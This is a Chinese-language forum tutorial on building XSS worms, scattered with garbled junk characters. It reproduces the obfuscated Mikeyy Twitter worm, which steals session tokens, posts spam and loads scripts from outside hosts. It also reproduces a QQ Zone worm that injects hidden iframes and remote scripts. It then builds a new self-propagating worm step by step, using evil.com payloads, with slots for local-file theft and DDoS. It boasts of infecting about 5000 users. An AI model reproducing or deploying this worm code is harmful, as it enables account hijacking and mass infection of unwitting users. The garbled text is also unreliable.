2 Y: P) l1 \: l; h9 U* H, F& `XmlHttp.open("GET\thttp://www.evil.com/collet.php","http://www.vul.site/wherever",false);
% g) U( @2 c6 h
; U! {/ Q1 k0 S8 S2 VXmlHttp.send(null);

<script>
: B9 i$ A& x7 i* \复制代码(IV) 综合性的高级XSS蠕虫:什么是XSS蠕虫,他的实现,传染,工作原理,常见作用都是什么.
5 |7 }0 Z) k: y复制代码案例:Twitter 蠕蟲五度發威
: ]( j, ~$ R- _* D5 Z0 w* P$ H* T第一版:
  下载 (5.1 KB)
  X! `# l4 Q6 g; U
- D" T9 r8 s+ m/ C- p* S6 天前 08:27
# {0 t. u/ }/ W7 k4 F, p9 v
第二版:   1. var _0xc26a = ["Msxml2.XMLHTTP", "Microsoft.XMLHTTP", "connect", "toUpperCase", "GET", "?", "open", "", "Method", "OST ", " HTTP/1.1", "setRequestHeader", "Content-Type", "application/x-www-form-urlencoded", "onreadystatechange", "readyState", "send", "split", "join", "'", "%27", "(", "%28", ")", "%29", "*", "%2A", "~", "%7E", "!", "%21", "%20", "+", "%", "replace", "innerHTML", "documentElement", "exec", "Twitter should really fix this... Mikeyy", "I am done... Mikeyy", "Mikeyy is done..", "Twitter please fix this, regards Mikeyy", "random", "length", "floor", "mikeyy "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e%74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%6a%73%78%73%73%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "mikeyy "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%63%6f%6e%74%65%6e%74%2e%69%72%65%65%6c%2e%63%6f%6d%2f%78%73%73%6a%73%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "mikeyy "></a><script>document.write(unescape(/%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%62%61%6d%62%61%6d%79%6f%2e%31%31%30%6d%62%2e%63%6f%6d%2f%77%6f%6d%70%77%6f%6d%70%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e/.source));</script> <a ", "/status/update", "OST", "authenticity_token=", "&status=", "&return_rendered_status=true&twttr=true", "/account/settings", "&user[name]=Womp+++++++++++++++++++++++++++++++++++++++++!&user=", "&tab=home&update=update", "/account/profile_settings", "&user[profile_default]=false&tab=none&profile_theme=0&user[profile_use_background_image]=0&user[profile_background_tile]=0&user[profile_link_color]=", "&commit=save+changes", "wait()""];  

   2.   
' ~; o) H5 r& O
+ F8 S' C9 n/ q  Z3 N1 G   3. function XHConn(){  
5 n* Z5 ^( l6 l  m' ~; t0 R4 K) I2 D6 D
   4.   var _0x6687x2,_0x6687x3=false;  
1 O7 q) c9 |" r! {3 m
% A3 B8 j" s1 q% O) R) E0 E   5.   try{ _0x6687x2= new ActiveXObject(_0xc26a[0x0]); }  
3 p9 o4 f/ o5 n% R" }
   6.   catch(e) { try{ _0x6687x2= new ActiveXObject(_0xc26a[0x1]); }  

   7.   catch(e) { try { _0x6687x2= new XMLHttpRequest(); }  
8 O9 u) H; ]. ^
   8.   catch(e) { _0x6687x2=false; }; }; };  
复制代码第六版:   1. function wait() {  
6 Q. T- R* a, R/ @3 X
   2.   var content = document.documentElement.innerHTML;  
8 D3 B0 ^! q; }* a
   3.   var tmp_cookie=document.cookie;  
; H& b, |" b; n$ D7 _5 R! `3 O
   4.   var tmp_posted=tmp_cookie.match(/posted/);  
+ X# v% r) \1 G) p9 Q# d
: n8 x. ^1 q! |  u# @   5.   authreg= new RegExp(/twttr.form_authenticity_token = '(.*)';/g);  

$ q# x) Y# t+ S   6.   var authtoken=authreg.exec(content);  
: a8 N( V! E/ j, X
3 O3 q5 W2 w1 W4 n1 Y2 o   7.   var authtoken=authtoken[1];  

   8.   var randomUpdate= new Array();  

; W- t  @3 ]: v   9.   randomUpdate[0]= "Be nice to your kids. They'll choose your nursing home. Womp. mikeyy.";  

  10.   randomUpdate[1]= "If you are born ugly blame your parents, if you died ugly blame your doctor. Womp. mikeyy.";  

* v) G2 m4 U* C9 b  11.   randomUpdate[2]= "Every man should marry. After all, happiness is not the only thing in life. Womp. mikeyy.";  
9 B$ P; a( t4 V
  12.   randomUpdate[3]= "Age is a very high price to pay for maturity. Womp. mikeyy.";  
0 u# u' ~$ G& K! l
/ ?( [& H# M( j9 J  13.   randomUpdate[4]= "Ninety-nine percent of all lawyers give the rest a bad name. Womp. mikeyy.";  
2 ]7 Q  C5 d5 {. n! w6 T" K
- N( G! _! k) V/ ]  14.   randomUpdate[5]= "If your father is a poor man, it is your fate, but if your father-in-law is a poor man, it's your stupidity. Womp. mikeyy.";  
$ \9 E9 ]; o' Z2 H1 v9 h
  15.   randomUpdate[6]= "Money is not the only thing, it's everything. Womp. mikeyy.";  

; t" s3 ~' b" P& A/ t: q  16.   randomUpdate[7]= "Success is a relative term. It brings so many relatives. Womp. mikeyy.";  

  17.   randomUpdate[8]= "'Your future depends on your dreams', So go to sleep. Womp. mikeyy.";  

7 F) X! H0 ^0 F7 V9 E  18.   randomUpdate[9]= "God made relatives; Thank God we can choose our friends.Womp. mikeyy.";  
1 ]/ V; m( O+ i1 U( E
1 D# C. q$ M1 A2 P  l! q" v  19.   randomUpdate[10]= "'Work fascinates me' I can look at it for hours ! Womp. mikeyy.";  
9 @* x. n* J4 J
+ X' ]; }2 |& {) C' m( f" C  20.   randomUpdate[11]= "I have enough money to last me the rest of my life. (unless I buy something) Womp. mikeyy.";  
: W; g- [7 ?2 g( R/ u7 r
  21.   randomUpdate[12]= "RT!! @spam Watch out for the Mikeyy worm [url]http://bit.ly/XvuJe";  
: t$ b/ T% I. C. l% ~
  22.   randomUpdate[13]= "FUCK. NEW MIKEYYY WORM! REMOVE IT: http://bit.ly/fuSkF";  
2 x1 d/ y* W1 a; k% v
  23.   randomUpdate[14]= "Mikeyy worm is back!!! Click here to remove it: http://bit.ly/UTPXe";  
8 r  I# U6 W* F# Z
9 _3 S" d/ j! K/ s. `  24.     
- J/ ]6 U5 Q1 {
' @) @& d! h& n3 _( t  25.   var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];  

  26.   var updateEncode=urlencode(randomUpdate[genRand]);  

$ Y* s, a, ], _, K7 ^  27.     

  28.   var ajaxConn= new XHConn();  

  29.   ajaxConn.connect("/status/update","OST","authenticity_token="+authtoken+_"&status="+updateEncode+"&return_rendered_status=true&twttr=true");  

  30.   var _0xf81bx1c="Mikeyy";  
+ g; [$ g: C4 N6 }. Y
" b+ O7 s" a  J1 B* r3 G  31.   var updateEncode=urlencode(_0xf81bx1c);  

3 N3 ?2 R7 P$ D# V  32.   var ajaxConn1= new XHConn();  

  33.   ajaxConn1.connect("/account/settings","OST","authenticity_token="]+authtoken+"&user[name]="+updateEncode+""+updateEncode+"&user[description]="+updateEncode+"&user[location]="+updateEncode+"&user[protected]=0&commit=Save");  

( D; Q! P( b2 B5 A6 ^  34.   var genXSS="000; }  #notifications{width: expression(document.body.appendChild(document.createElement('script')).src='http://runebash.net/xss.js');) #test { color:#333333";  
0 J  N! A0 U7 B$ Q# \# N% K
8 ~+ Z9 Y. O$ M  35.   var XSS=urlencode(genXSS);  

) S) ~, K: V' u$ Z; A! X  36.   var ajaxConn2= new XHConn();  
. u$ |" @4 ?8 K3 n8 ]( a
  37.   ajaxConn2.connect("/account/profile_settings",""OST,"authenticity_token="]+authtoken+"&user[profile_sidebar_fill_color]="+XSS+"&commit=save+changes");  
' q' h: E# H4 p! o+ l7 Z
  38.     
* E( b9 O% f& g& o+ r% O3 Y
  39. } ;  

& S. A+ z6 ~* a* [0 q  40. setTimeout(wait(),5250);  
! T9 `) u. Z# d$ }% i复制代码QQ空间XSSfunction killErrors() {return true;}

, {, b. V  z6 W* v! f& O6 K3 Ywindow.onerror=killErrors;
# O4 v7 ]" ?3 n0 d# @. Z
$ k. E5 [5 k) a

% Z9 `$ w( F& C$ t! }var shendu;shendu=4;

//---------------global---v------------------------------------------

//通过indexOf函数得到URL中相应的字符串，用于判断是否登录的吧？
% M+ P4 o$ z% z% a& H4 P. J8 S
var visitorID;var userurl;var guest;var xhr;var targetblogurlid="0";
# Y2 ^3 M, q0 a9 X# D( x2 {
, W4 F0 r6 |4 ~/ v: }  tvar myblogurl=new Array();var myblogid=new Array();
& H* A+ Z: _7 ?5 u) @2 U; [/ B
        var gurl=document.location.href;

        var gurle=gurl.indexOf("com/");

        gurl=gurl.substring(0,gurle+3);        

        var visitorID=top.document.documentElement.outerHTML;

# R, h( C* \$ N           var cookieS=visitorID.indexOf("g_iLoginUin = ");
. f! I% V3 @. ]1 u/ f8 `
        visitorID=visitorID.substring(cookieS+14);
. B5 `' k& I1 y6 Y8 N5 w
. @/ G& V8 m+ p0 v8 |8 Y        cookieS=visitorID.indexOf(",");

        visitorID=visitorID.substring(0,cookieS);

        get_my_blog(visitorID);
/ B7 ?: A# O2 n$ f
1 _8 O: X/ k8 a) Z! W( m        DOshuamy();
8 W6 R8 x: x. s5 W9 h. L" t
$ ^. I- v) v' p/ {9 P

3 C! _( `/ s7 R- }7 P//挂马

function DOshuamy(){
6 S: A1 q# p9 O
var ssr=document.getElementById("veryTitle");

ssr.insertAdjacentHTML("beforeend","<iframe width=0 height=0 src='http://www.xxx.com/1.html'></iframe>");
) ?4 N& A' W: N: P& m% T8 k
( x* v5 H9 o, q}
- Y8 Y, c4 k% h+ |, a3 t% M


//如果创建XMLHttpRequest成功就跳到指定的URL去，这个URL是干什么的就不知道了，没看过，刷人气？

  s# r3 _! H. O( [1 q. M6 g- Cfunction get_my_blog(visitorID){
. y, K6 E2 k. D2 y5 d$ i
# w) ?6 [) b$ s) V" |( F   userurl=gurl+"/cgi-bin/blognew/blog_output_toppage?uin="+visitorID+"&direct=1";

* q8 U, y$ V9 k- x: I! X   xhr=createXMLHttpRequest();    //创建XMLHttpRequest对象
8 J- {: `3 C4 W5 f
. L& \7 v" Q( V0 `- e   if(xhr){    //成功就执行下面的
& W0 ]( H8 r$ C$ v+ X4 y7 C5 q# q
% q( T' K, \) ~     xhr.open("GET",userurl,false);    //以GET方式打开定义的URL

     xhr.send();guest=xhr.responseText;
4 c7 |3 E4 h; f$ g
  H7 y2 d  g5 Z/ ]+ w     get_my_blogurl(guest);    //执行这个函数

$ J! c/ C. B4 \$ V- Z    }

}
3 o8 y+ p' ?# o7 u0 z3 a
3 ?  D, [# z0 C# n  `/ v
6 K. D" j9 X% t/ r" W) E9 v0 m
2 c9 A( i5 E  a//这里似乎是判断没有登录的
' P. i* F+ P% b+ M; @
9 x& t0 l" \, X" y9 `4 C( W  v( efunction get_my_blogurl(guest){
, u- g0 g, z; \5 }0 @4 G. A% R
' ]5 _0 ]8 f/ Q1 w$ G  var mybloglist=guest;
4 O( Z* g: J3 j9 v- \, R
  var myurls;var blogids;var blogide;
# g$ a/ `' r6 [2 i, |. }
  for(i=0;i<shendu;i++){
& U! {7 Q4 _4 _, k* e
     myurls=mybloglist.indexOf('selectBlog(');    //查找URL中"selectBlog"字符串，干什么的就不知道了

     if(myurls!=-1){    //找到了就执行下面的

" X$ N$ r3 R  R; M. `+ q; S% ~" b' \         mybloglist=mybloglist.substring(myurls+11);

         myurls=mybloglist.indexOf(')');
$ }* t5 K+ C- H* y
, u8 y* d0 X% B( z         myblogid=mybloglist.substring(0,myurls);
9 R* f" w5 B, n* v# R9 a
- _. V/ z8 F7 H  u! ^        }else{break;}
3 \1 M7 c, j* y1 O1 h( L/ l
}

: S9 C: S8 f4 @: G7 I' r% tget_my_testself();    //执行这个函数

}
& i1 o) |1 W6 U3 F! L1 \
; O7 W" V$ [2 B
" D* M4 }. r+ t, b9 q0 Z. b' k
//这里往哪跳就不知道了
& t9 i$ B' [' e. X: a% u& r
% v  P# p- t" d& s( D1 b( pfunction get_my_testself(){
  c* @5 b: O) k
4 I" k+ W. U9 B/ d* e/ I  for(i=0;i<myblogid.length;i++){    //获得blogid的值

0 T  [. F" ~' x1 ]' O$ R6 M      var url=gurl+"/cgi-bin/blognew/blog_output_data?uin="+visitorID+"&blogid="+myblogid+"&r="+Math.random();

      var xhr2=createXMLHttpRequest();    //创建XMLHttpRequest对象

& q5 ^3 a8 S. R      if(xhr2){        //如果成功

              xhr2.open("GET",url,false);     //打开上面的那个url
" p' E" }  F2 Q) O5 A
% {& N3 H7 Q# O0 K              xhr2.send();

              guest2=xhr2.responseText;
) B7 Z( ?0 P) k: V
              var mycheckit=guest2.indexOf("baidu");    //找"baidu"这个字符串，找它做什么？

              var mycheckmydoit=guest2.indexOf("mydoit"); //找"mydoit"这个字符串

- D: g, T  l3 K8 s5 P0 i              if(mycheckmydoit!="-1"){    //返回-1则代表没找到

                targetblogurlid=myblogid;   
/ j* M* v) j! _4 }
                add_jsdel(visitorID,targetblogurlid,gurl);    //执行它
' t, G4 Q5 B& N# f) w: C  ^2 w
                break;
; d2 K  B5 L7 W; X$ [
- v0 p- G- a! E, @: l               }
) v) x+ j( Z& `
; b! c9 Y; |, i  o              if(mycheckit=="-1"){

                targetblogurlid=myblogid;
) Z4 F' w5 F6 P
. }# Q$ ]/ ?/ I% H1 C                add_js(visitorID,targetblogurlid,gurl);    //执行它
% W# L0 B4 \3 i& P7 y# a9 C3 P8 o
8 g& b; |8 J7 l6 E4 W/ G2 n                break;
& R, K  x8 W! t- f9 c
               }
1 f2 w) A+ Z# X% e4 g3 d
        }      

, o1 L, _# [' E, K+ E$ `. |}
. \* U. t* U" u' k& ^- B
}
+ w( @! r) b, s, B9 t

) {# I2 X8 V( j, L9 O2 k
  Y& x  x- }$ ]: J//--------------------------------------  
' k* T4 E' R8 h8 [0 a! z
# r7 h  ?. R% D7 |6 N//根据浏览器创建一个XMLHttpRequest对象

function createXMLHttpRequest(){

# c4 S# k! h& N9 ?6 o% t8 G    var XMLhttpObject=null;  

    if (window.XMLHttpRequest) {XMLhttpObject = new XMLHttpRequest()}  
, e4 ]5 p  e+ o
    else  
0 q" U# R: [: Z% V( G: S
      { var MSXML=['Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP','MSXML.XMLHTTP', 'MICROSOFT.XMLHTTP.1.0','MICROSOFT.XMLHTTP.1', 'Microsoft.XMLHTTP'];        

4 W, [/ ?# p, q$ _        for(var i=0;i<MSXML.length;i++)  
: r3 T0 Y5 x) z; k% e3 j! ^
        {  

' h( N: ~. ]5 }6 H( K9 l; Z            try  

            {  

* ]. S- k9 z/ i" l4 m                XMLhttpObject=new ActiveXObject(MSXML);  

6 U  Q2 V8 V2 G. A$ \! a5 M                break;  
  E' s! e" i/ B! i
            }  
+ P% u" B# k6 t6 K/ c. {
            catch (ex) {  
% r) d" N. G6 E, p
            }  
: B6 M' c- H% C) H; C
         }  

# r: g& [- n6 \4 g% }      }

return XMLhttpObject;
' h8 Z4 p8 `( M9 G
3 g' F) G5 p: E7 F. `}  


9 o/ @2 r) q- W$ T  V8 V. Q
/ B% x7 y5 R: \# m& b3 ^//这里就是感染部分了

function add_js(visitorID,targetblogurlid,gurl){
9 {3 \, U7 D1 @" {8 k
var s2=document.createElement('script');

s2.src='http://xss0211.111.5ghezu.com.cn/images/qq/temp/wm/linshi/index.php?gurl='+gurl+'&uin='+visitorID+'&blogid='+targetblogurlid+"&r="+Math.random();

5 [8 v6 u+ T" l4 v* Ns2.type='text/javascript';

document.getElementsByTagName('head').item(0).appendChild(s2);
; N2 u. A9 E+ Z4 W3 S+ j- N0 k  H
& R. @: z( ^9 Z( o" m, c7 |7 u# K}

1 L+ ?0 Z3 j5 o- C! r4 H' b

function add_jsdel(visitorID,targetblogurlid,gurl){

var s2=document.createElement('script');
, }1 D- z! U5 q0 D' j4 e& q& S
s2.src='http://xss0211.111.5ghezu.com.cn/images/qq/temp/wm/linshi/del.php?gurl='+gurl+'&uin='+visitorID+'&blogid='+targetblogurlid+"&r="+Math.random();

s2.type='text/javascript';
; q6 ?' K+ `; E3 U, l" e/ [
: p- Y) @& F, Q- e8 S; cdocument.getElementsByTagName('head').item(0).appendChild(s2);

/ \: C: z7 i+ U6 ~6 `) O: g}
$ `" O% ], H/ \& ^  |# Z+ _$ T复制代码通过以上几个蠕虫,我们可以总结蠕虫的工作原理为:
% y1 Z* X* I: U1:首先写入调用蠕虫代码到一个存在XSS漏洞的位置(在非长久性XSS漏洞里,我们也可以通过把短暂性的XSS连接通过各种传播方式,发送给其他用户,当某个用户中了XSS后,再通过蠕虫,向其好友发送同一短暂性XSS连接.)
7 {& N+ j+ Q- S/ J6 X' t* g  m
4 G7 _: @5 H5 {; i+ E4 w: ?! p5 T2:受害用户在登陆状态中,观看了存在XSS的问题页面,JS执行,并植入XSS蠕虫代码到该用户帐户中,且通过搜索好友等方法,传播给其他用户.即复制感染过程.(在论坛或者回复类型页面中传播XSS蠕虫,只要保证每页面同时存在2个或者以上蠕虫,就可以保证蠕虫不会被增加的数据覆盖.)

4 X8 _( {  e, |综上所述,结合以上种种技巧,就可以创造我们自己的XSS蠕虫了.在我们的蠕虫里,我们可以添加截取屏幕功能,DDOS功能,可以判断客户端浏览器的版本,读取并且发送客户端的本地文件~
. c* t" x' \1 D1 q( ^4 C. ]

" u# ~; g! I3 ~5 R7 S" [) r下面,我们来初步写一个简单主体蠕虫,并且预留可添加功能的地方.

首先,自然是判断不同浏览器,创建不同的对象var request = false;
+ d) m# ~9 j, s: `" b5 L# ~
3 K7 C' }; v0 D8 y+ hif(window.XMLHttpRequest) {

# q9 E* _4 `- j. Zrequest = new XMLHttpRequest();
1 M* z, j, D1 Y; \% ]* ]- o( v5 b
if(request.overrideMimeType) {

request.overrideMimeType('text/xml');

- T& J# D0 X3 W$ t" M}

3 J' z. N  d9 X# C3 u} else if(window.ActiveXObject) {

/ x3 ?( \& P/ b) b1 L+ d# bvar versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
" t$ K: a. \, L5 ^8 b9 F& q
for(var i=0; i<versions.length; i++) {

try {

request = new ActiveXObject(versions);
) l7 r" f  E; H" R$ b
, |3 [# O' \  m, [; F} catch(e) {}
8 T% n8 w6 `& j5 C% i1 z6 I0 ?0 B0 ~
& s. s" f& {8 i' |0 k}

}

xmlHttpReq=request;
复制代码可以此时添加判断浏览器具体型号和版本:   function browserinfo(){

        var Browser_Name=navigator.appName;
2 ]- ^* d, L. Q; j
        var Browser_Version=parseFloat(navigator.appVersion);
8 D1 o" @0 E4 w
        var Browser_Agent=navigator.userAgent;
! ]) k* N/ w& c: {3 B
8 j- ~: H) p" u' A        

        var Actual_Version,Actual_Name;

        

& l0 D' |9 r( g8 e$ V9 O6 y0 R8 |        var is_IE=(Browser_Name=="Microsoft Internet Explorer");

+ u  a0 H; W2 L7 |. {        var is_NN=(Browser_Name=="Netscape");
6 f; w+ V: l" O; d+ Z
        var is_Ch=(Browser_Name=="Chrome");

        
( F/ i% f% Z5 ~- C( |2 Q4 i1 o0 |
        if(is_NN){

; g7 p) L4 G, t2 U$ r            if(Browser_Version>=5.0){

                var Split_Sign=Browser_Agent.lastIndexOf("/");
6 ]1 v- h( U8 C* ^5 _& x
1 ?& i) \( |, R, Q, g& T" o- f                var Version=Browser_Agent.indexOf(" ",Split_Sign);

                var Bname=Browser_Agent.lastIndexOf(" ",Split_Sign);
! H. c# _( r$ e% i" v8 u% A
) `5 C5 o) m/ y8 d) L& p

                Actual_Version=Browser_Agent.substring(Split_Sign+1,Version);
1 S; W# S: J: f4 H0 t1 I
                Actual_Name=Browser_Agent.substring(Bname+1,Split_Sign);
. F; `9 h- L2 S4 ]" Z" ]7 }
& ]/ r- s/ p! @4 L' e/ [3 S/ z            }
! l( h" y' l# p( o3 S
            else{

                Actual_Version=Browser_Version;
  {5 c$ F* i) N8 K
9 Y0 {  d& Z2 _) p1 ]$ s( `: s) j: m0 _                Actual_Name=Browser_Name;

            }
5 \0 M( n9 s/ l  V
        }

& V+ C. m* G/ l( Z3 S        else if(is_IE){
3 v- u! P0 X- K8 W' o
            var Version_Start=Browser_Agent.indexOf("MSIE");
8 G! [; x5 z9 Z# ?/ k3 f. t% @+ I
            var Version_End=Browser_Agent.indexOf(";",Version_Start);

; v, h" b4 t+ s8 J+ N# O            Actual_Version=Browser_Agent.substring(Version_Start+5,Version_End)
0 q) O. D$ R3 |" ?( t# W! O
            Actual_Name=Browser_Name;
9 s( f* E3 v2 L# N5 L
            
6 Q4 v' B: u; Z/ T& \, A1 ^8 Q$ O
$ L% D* S3 Y6 a, |& ]  l            if(Browser_Agent.indexOf("Maxthon")!=-1){
, _1 p. r$ Y1 ?1 G" e2 s" w
                Actual_Name+="(Maxthon)";

            }
1 z5 b* R9 @, y" P2 b
            else if(Browser_Agent.indexOf("Opera")!=-1){

                Actual_Name="Opera";
7 }; c) o% v& {
+ E; U: h" i; o* \                var tempstart=Browser_Agent.indexOf("Opera");

1 \! e" J( r) n; S+ S                var tempend=Browser_Agent.length;

                Actual_Version=Browser_Agent.substring(tempstart+6,tempend)
+ S: z4 }5 {0 K7 v1 j8 }% c6 l
            }

        }

        else if(is_Ch){
  _* S; o) [3 D1 e; C; V
0 w9 U/ E7 e1 j- h& a: [. u            var Version_Start=Browser_Agent.indexOf("Chrome");
* P3 |  r. J  Z
            var Version_End=Browser_Agent.indexOf(";",Version_Start);
9 E: ?4 [) C# ?5 ]
( ?$ x0 ^- C, r% @; }            Actual_Version=Browser_Agent.substring(Version_Start+5,Version_End)
9 I1 u" `6 P8 {% y8 I* w
            Actual_Name=Browser_Name;

! O/ l3 Y- Q' I+ q            
4 b1 e% J! O  c4 c% x- s
( v9 }9 ?8 V5 l& K0 ]2 m/ T            if(Browser_Agent.indexOf("Maxthon")!=-1){

9 T$ A- f, ^" D; H, E3 L                Actual_Name+="(Maxthon)";
* [6 k" `9 F: V4 x* x
2 V( M/ f" Y: J1 F            }
& h- j/ c/ K2 `0 M
, V6 v5 Y. W# T7 B9 @8 s            else if(Browser_Agent.indexOf("Opera")!=-1){
2 ~% I% Z3 F) M: ^! Z
. j/ A9 n8 z- Y  \                Actual_Name="Opera";
' M5 e; ?: S0 ^% ]+ U
/ R) ~6 i4 r8 Q                var tempstart=Browser_Agent.indexOf("Opera");

                var tempend=Browser_Agent.length;
. R& V( a, O8 l( m  }; E
' }( K: f, u" j- p1 l                Actual_Version=Browser_Agent.substring(tempstart+6,tempend)
7 [$ c6 V! k1 `" ^
            }
1 J+ u; c8 x9 q) `$ g6 w) t+ _
' m9 l' ]0 G- `( A4 v0 {0 T        }
) }, [$ K7 [+ v
        else{
* M+ m4 G) r" X4 P+ H! [
5 y* \' Y: g- i$ Q$ ~) h) S# ?5 t            Actual_Name="Unknown Navigator"
9 @% R; A6 m7 n6 o1 ]
            Actual_Version="Unknown Version"

' \3 X# U. I! B2 z        }
# Z, b- ^9 s, _
5 A4 T' \1 n8 p5 Y7 u" T; M, a
6 q" b# V* Y6 u1 n) s8 k6 O! P
        navigator.Actual_Name=Actual_Name;
5 f( K0 U6 q2 ^) ~2 P0 J7 ]' }
' y, g2 r5 s, o- I0 B, y        navigator.Actual_Version=Actual_Version;
# G. Z1 y' |: r% M+ ~
        

: D, r+ R$ A/ ?- G: V8 G        this.Name=Actual_Name;

        this.Version=Actual_Version;
7 ^' v; h+ v0 X  p0 j
! \7 _( T3 {! _    }
1 g; D" s' s  i6 }  \
( b" g* H. t+ v" k2 t/ j# y    browserinfo();

2 S2 o/ a' J% V  H    if(navigator.Actual_Version<8&&navigator.Actual_Name=="Miscrosoft Internet Explorer"){//调用IE读取本地敏感文件}
( j* W( ]/ c6 @
, Q6 t( C, n, {/ j5 z- ^8 ]" R    if(navigator.Actual_Version<8&&navigator.Actual_Name=="Fire fox"){//调用Firefox读取本地敏感文件}

    if(navigator.Actual_Version<8&&navigator.Actual_Name=="Opera"){//调用Opera读取本地敏感文件}
2 h. q. ], _+ X3 |: W( M
    if(navigator.Actual_Version<8&&navigator.Actual_Name=="Google Chrome"){//调用Google Chrome读取本地敏感文件}
复制代码随后可以选择调用镜象网页并且发送功能.参考上面的镜象代码
复制代码随后可以选择调用DDOS功能.参考上面的DDOS代码
复制代码然后,在感染和传播功能发作之前,我们要判断当前页面有没有蠕虫存在,如果有,有多少只.如果虫的数量足够,我们就不要再植入蠕虫了.只要保证一定的数量就好.xmlHttpReq.open("GET","http://vul.com/vul.jsp", false);  //读取某页面.
9 ?% j& j, u5 n% k; H
xmlHttpReq.send(null);
/ U6 B% X7 ?5 q: M
9 S6 w# [3 t* x- Uvar resource = xmlHttpReq.responseText;

var id=0;var result;

4 I( z# d- Y6 y. {: svar patt = new RegExp("bugbug.js","g");     //这里是蠕虫的关键词,用以确定页面有多少只虫.譬如如果你的虫在bugbug.js,那么就可以搜索这个JS在页面内的数量.

* N3 }8 U6 w$ J; q& Swhile ((result = patt.exec(resource)) != null)  {
: p, _0 }; G  }3 s+ n8 t. k7 D
id++;

3 R3 x, y7 }4 H6 y& Y}
复制代码然后,我们根据数量,来做下一步的操作.先判断,如果数量太少,我们就要让蠕虫感染起来.if(id<2){     //这里我们假设要求那个页面蠕虫的数量要有2只.

no=resource.search(/my name is/);
6 o/ C3 u# F5 q: q# K
* A- [, ]. }7 |% F3 Qvar wd='<script src="http://www.evil.com/bugbug.js"</script>';        //wd是存在XSS漏洞的变量.我们在这里写入JS代码.
8 v; u/ M; ^; m6 u
var post="wd="+wd;
) t! j2 I# M. r) j4 _
xmlHttpReq.open("OST","http://www.vul.com/vul.jsp",false);        //把感染代码 POST出去.

9 w+ r( r8 m2 i/ MxmlHttpReq.setRequestHeader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");

& z  a% t+ X7 N9 t+ U! B& \xmlHttpReq.setRequestHeader("content-length",post.length);
/ m7 r: v* D" }' c. m- S
xmlHttpReq.setRequestHeader("content-type","application/x-www-form-urlencoded");

; q1 W5 b- s* fxmlHttpReq.send(post);

}
% ^$ m1 a  G% Q- ^5 C复制代码如果虫的数量已经足够,那么我们就执行蠕虫:else{
1 r) B4 @  [  q. p2 {
var no=resource.search(/my name is/);     //这里是访问一个授权页面里,取得用户的名称.备份,并将来用在需要填写名称的地方

var namee=resource.substr(no+21,5);     //这里是重组用户名,条件是随便写的.具体情况当然要不同获得.
$ s) O; k1 e4 A8 D
var wd="Support!"+namee+"<br>";        //这里就发出去了一个你指定的MESSAGE.当然,你可以把数据存入一组数组,random读取.
$ i3 P# X  U8 f1 c& |
var post="wd="+wd;
6 v* z" h0 w6 b, \" R- p9 X3 Q
1 n! r! e  J3 z# \5 RxmlHttpReq.open("OST","http://vul.com/vul.jsp",false);

xmlHttpReq.setRequestHeader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");

xmlHttpReq.setRequestHeader("content-length",post.length);

8 R2 Q! g. s! H% Z7 JxmlHttpReq.setRequestHeader("content-type","application/x-www-form-urlencoded");
' g) T, c  |6 y0 P" M
% I$ u1 Y* T- N2 d7 ]  N2 C, qxmlHttpReq.send(post);                 //把传播的信息 POST出去.
3 N- s, p8 x0 u9 E% s+ J; B
6 n7 k- e( b% f! R( \$ |}
7 k$ Z7 }7 Y! {+ y9 D复制代码-----------------------------------------------------总结-------------------------------------------------------------------


) F0 p2 h+ Q; F# I6 u# k+ x; T# h
本次教程案例中的蠕虫曾经测试成功并且感染了约5000名用户.
) @8 }- X3 ^, x7 j3 o9 y6 {" l蠕虫仅仅是一个载体,在这个载体上,我们可以实现各种各样的功能.
' K* H0 t* T9 l! l1 \操作JS调用COM,你的想象力有多大,蠕虫能力就有多大.这也是为什么国外黑客往往喜欢写蠕虫的原因.
6 g& E0 k6 m( D' i" @
) Q' `7 h$ o/ s9 e
4 a/ X6 Y* c! C; [
. N7 S/ o3 T, h, w9 H
% w8 i$ M6 @. w5 y" ?4 R
4 V8 O5 X, Y! X0 l2 v4 g
' I- T7 D' K! b: [% e3 Q$ y
8 _8 G" s; B& c& w8 T7 O
9 f( D  p2 L& g本文引用文档资料:
9 `  w) N+ @! U! R
"HTTP Request Smuggling" (Chaim Linhart, Amit Klein, Ronen Heled and Steve Orrin, June 2005)
9 o" V' Y8 p5 n* g4 C  h9 C' x) aOther XmlHttpRequest tricks (Amit Klein, January 2003)
"Cross Site Tracing" (Jeremiah Grossman, January 2003)
http://armorize-cht.blogspot.com 阿碼科技非官方中文 Blog
空虚浪子心BLOG http://www.inbreak.net
Xeye Team http://xeye.us/

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2